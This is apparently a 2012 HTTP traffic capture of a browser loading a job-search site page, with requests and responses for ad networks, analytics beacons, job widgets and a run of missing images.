Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
X-Frame-Options: ALLOWALL
Location: http://www.gmodules.com/gadgets/ifr?url=http://nuzs.com/promotion.xml&amp;synd=open&amp;w=360&amp;h=340&amp;title=Office+Etiquette+Tips+-+Click+Image+&amp;border=%23ffffff%7C3px%2C1px+solid+%23999999&amp;output=js
Cache-Control: private
X-Content-Type-Options: nosniff
Date: Wed, 07 Nov 2012 16:21:16 GMT
Server: igfe
Content-Length: 410
X-XSS-Protection: 1; mode=block
GET /js/plusone.js HTTP/1.1

Host: apis.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: application/javascript; charset=utf-8
X-UA-Compatible: IE=edge, chrome=1
Etag: &quot;99cef75a216e7271081f480fb640e7fe&quot;
Expires: Wed, 07 Nov 2012 16:21:16 GMT
Date: Wed, 07 Nov 2012 16:21:16 GMT
Cache-Control: private, max-age=1800
Content-Encoding: gzip
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
GET /jobsearchtools.html/186/images/01a.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:16 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=399
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/02a.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:16 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=399
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/03a.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:16 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=399
Connection: Keep-Alive
GET /embed/?username=betterjobsearch&style=bird HTTP/1.1

Host: twittercounter.com
GET /embed/?username=betterjobsearch&amp;style=bird HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Expires: Thu, 08 Nov 2012 14:29:03 GMT
Last-Modified: Fri, 13 Apr 2012 20:00:00 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 308
Accept-Ranges: bytes
Date: Wed, 07 Nov 2012 16:21:16 GMT
Age: 6733
Connection: keep-alive
X-Cache: HIT
GET /c/jbb/js/jbb_remote_banner.js HTTP/1.1

Host: betterjobs.jobamatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: text/javascript
Server: nginx
Date: Wed, 07 Nov 2012 16:21:16 GMT
Content-Length: 683
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: max-age=0
GET /gadgets/ifr?url=http://nuzs.com/promotion.xml&synd=open&w=360&h=340&title=Office+Etiquette+Tips+-+Click+Image+&border=%23ffffff%7C3px%2C1px+solid+%23999999&output=js HTTP/1.1

Host: www.gmodules.com
GET /gadgets/ifr?url=http://nuzs.com/promotion.xml&amp;synd=open&amp;w=360&amp;h=340&amp;title=Office+Etiquette+Tips+-+Click+Image+&amp;border=%23ffffff%7C3px%2C1px+solid+%23999999&amp;output=js HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
P3P: CP=&quot;CAO PSA OUR&quot;
Content-Encoding: gzip
Date: Wed, 07 Nov 2012 16:21:16 GMT
Expires: Wed, 07 Nov 2012 16:21:16 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 1033
Server: GSE
GET /jobsearchtools.html/scripts/user.js HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
If-Modified-Since: Wed, 05 Oct 2011 15:41:30 GMT
If-None-Match: &quot;19b842-23f-4ae8f0ab47e80&quot;
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:16 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=399
Connection: Keep-Alive
GET /fs-bin/show?id=U9fowIrF314&bids=243089.10000005&type=3&subid=0 HTTP/1.1

Host: ad.linksynergy.com
GET /fs-bin/show?id=U9fowIrF314&amp;bids=243089.10000005&amp;type=3&amp;subid=0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 07 Nov 2012 16:21:16 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Wed, 07 Nov 2012 18:21:16 GMT
nnCoection: close
Transfer-Encoding: chunked
GET /c/jbb/images/jbb-widget-vertical-gel/blue/view-all-jobs-button.gif HTTP/1.1

Host: betterjobs.jobamatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx
Date: Wed, 07 Nov 2012 16:21:16 GMT
Content-Length: 3514
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: max-age=0
GET /jobsearchtools.html/186/images/04a.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:16 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=398
Connection: Keep-Alive
GET /c/jbb/images/banner400x60.gif HTTP/1.1

Host: betterjobs.jobamatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx
Date: Wed, 07 Nov 2012 16:21:16 GMT
Content-Length: 6260
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: max-age=0
GET /c/jbb/js/jbb_widget_vertical_gel.js HTTP/1.1

Host: betterjobs.jobamatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: text/javascript
Server: nginx
Date: Wed, 07 Nov 2012 16:21:16 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: max-age=0
Content-Encoding: gzip
GET /PK/AffAds.aspx?key=employment&ps=1&pn=1&aff=285083 HTTP/1.1

Host: ppc.adlandpro.com
GET /PK/AffAds.aspx?key=employment&amp;ps=1&amp;pn=1&amp;aff=285083 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Connection: Keep-Alive
Transfer-Encoding: chunked
Date: Wed, 07 Nov 2012 16:24:36 GMT
Server: Microsoft-IIS/6.0
Cache-Control: private
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=gsudkoi0dzck3b45hkpnu2qg; path=/; HttpOnly
GET /jobsearchtools.html/186/images/05a.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:16 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=398
Connection: Keep-Alive
GET /nw/getwidgetinfo.php?wid=3587 HTTP/1.1

Host: www.myresellrightsgoldmine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:17 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_qos/9.74
Content-Length: 600
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/07a.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:16 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=398
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/06a.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:16 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=398
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/08a.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:16 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=398
Connection: Keep-Alive
GET /a/jbb/find-jobs-json/put_price HTTP/1.1

Host: betterjobs.jobamatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Server: nginx
Date: Wed, 07 Nov 2012 16:21:16 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: gc=1; expires=Thu, 08-Nov-2012 16:21:16 GMT; path=/ shup=fvt%3D509a8a7c%26ncs%3D1%26lst%3D509a8a7d; expires=Fri, 07-Dec-2012 16:21:17 GMT; path=/ sh_uid=id%3A439558606509a8a7cbb0b20.17127084; expires=Mon, 06-Nov-2017 16:21:16 GMT; path=/ sh_sess=id%3A1352305276%2Csrc%3Aseo.other%2Cnu%3A1; expires=Wed, 07-Nov-2012 16:51:16 GMT; path=/
Cache-Control: no-cache, must-revalidate
Content-Encoding: gzip
GET /jobsearchtools.html/scripts/photoalbum.js HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
If-Modified-Since: Wed, 05 Oct 2011 15:41:30 GMT
If-None-Match: &quot;19b842-23f-4ae8f0ab47e80&quot;
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:17 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=397
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/09a.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:16 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=398
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/10a.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:17 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=397
Connection: Keep-Alive
GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=917305030&utmhn=www.betterjobsearch.com&utmcs=ISO-8859-1&utmsr=1176x885&utmvp=1159x3&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=A%20Betterjobsearch.com%20-%20Career%20Links&utmhid=818000803&utmr=http%3A%2F%2Fartworksmagazine.com%2F2010%2F04%2Fphotography-of-alexis-west%2F&utmp=%2Fjobsearchtools.html%2Fcounter.php&utmac=UA-8595593-1&utmcc=__utma%3D121019547.792442701.1352305277.1352305277.1352305277.1%3B%2B__utmz%3D121019547.1352305277.1.1.utmcsr%3Dartworksmagazine.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2F2010%2F04%2Fphotography-of-alexis-west%2F%3B&utmu=D~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.7&amp;utms=1&amp;utmn=917305030&amp;utmhn=www.betterjobsearch.com&amp;utmcs=ISO-8859-1&amp;utmsr=1176x885&amp;utmvp=1159x3&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=A%20Betterjobsearch.com%20-%20Career%20Links&amp;utmhid=818000803&amp;utmr=http%3A%2F%2Fartworksmagazine.com%2F2010%2F04%2Fphotography-of-alexis-west%2F&amp;utmp=%2Fjobsearchtools.html%2Fcounter.php&amp;utmac=UA-8595593-1&amp;utmcc=__utma%3D121019547.792442701.1352305277.1352305277.1352305277.1%3B%2B__utmz%3D121019547.1352305277.1.1.utmcsr%3Dartworksmagazine.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2F2010%2F04%2Fphotography-of-alexis-west%2F%3B&amp;utmu=D~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 01 Nov 2012 01:30:59 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 571818
Server: GFE/2.0
GET /pagead/viewthroughconversion/1049251344/?random=1352305277388&cv=7&fst=1352305277388&num=1&fmt=1&label=JbXSCJiwugMQkJyp9AM&guid=ON&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_his=1&u_tz=60&u_java=true&u_nplug=8&u_nmime=54&ref=http%3A//artworksmagazine.com/2010/04/photography-of-alexis-west/&url=http%3A//www.betterjobsearch.com/jobsearchtools.html/counter.php&frm=2 HTTP/1.1

Host: googleads.g.doubleclick.net
GET /pagead/viewthroughconversion/1049251344/?random=1352305277388&amp;cv=7&amp;fst=1352305277388&amp;num=1&amp;fmt=1&amp;label=JbXSCJiwugMQkJyp9AM&amp;guid=ON&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_his=1&amp;u_tz=60&amp;u_java=true&amp;u_nplug=8&amp;u_nmime=54&amp;ref=http%3A//artworksmagazine.com/2010/04/photography-of-alexis-west/&amp;url=http%3A//www.betterjobsearch.com/jobsearchtools.html/counter.php&amp;frm=2 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
P3P: policyref=&quot;http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml&quot;, CP=&quot;CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR&quot;
Date: Wed, 07 Nov 2012 16:21:17 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Server: cafe
Content-Length: 76
X-XSS-Protection: 1; mode=block
GET /image-1839237-10484790 HTTP/1.1

Host: www.tqlkg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 302 Found

Content-Type: text/html
Server: Resin/3.1.8
P3P: policyref=&quot;http://www.tqlkg.com/w3c/p3p.xml&quot;, CP=&quot;ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT&quot;
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Wed, 07 Nov 2012 16:21:17 GMT
Location: http://www.yceml.net/0054/10484790-8.gif
Content-Length: 78
nnCoection: close
Date: Wed, 07 Nov 2012 16:21:17 GMT
GET /image-1839237-10641705 HTTP/1.1

Host: www.lduhtrp.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 302 Found

Content-Type: text/html
Server: Resin/3.1.8
P3P: policyref=&quot;http://www.lduhtrp.net/w3c/p3p.xml&quot;, CP=&quot;ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT&quot;
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Wed, 07 Nov 2012 16:21:17 GMT
Location: http://www.yceml.net/0297/10641705-6.gif
Content-Length: 78
nnCoection: close
Date: Wed, 07 Nov 2012 16:21:17 GMT
GET /image-1839237-10484757 HTTP/1.1

Host: www.lduhtrp.net

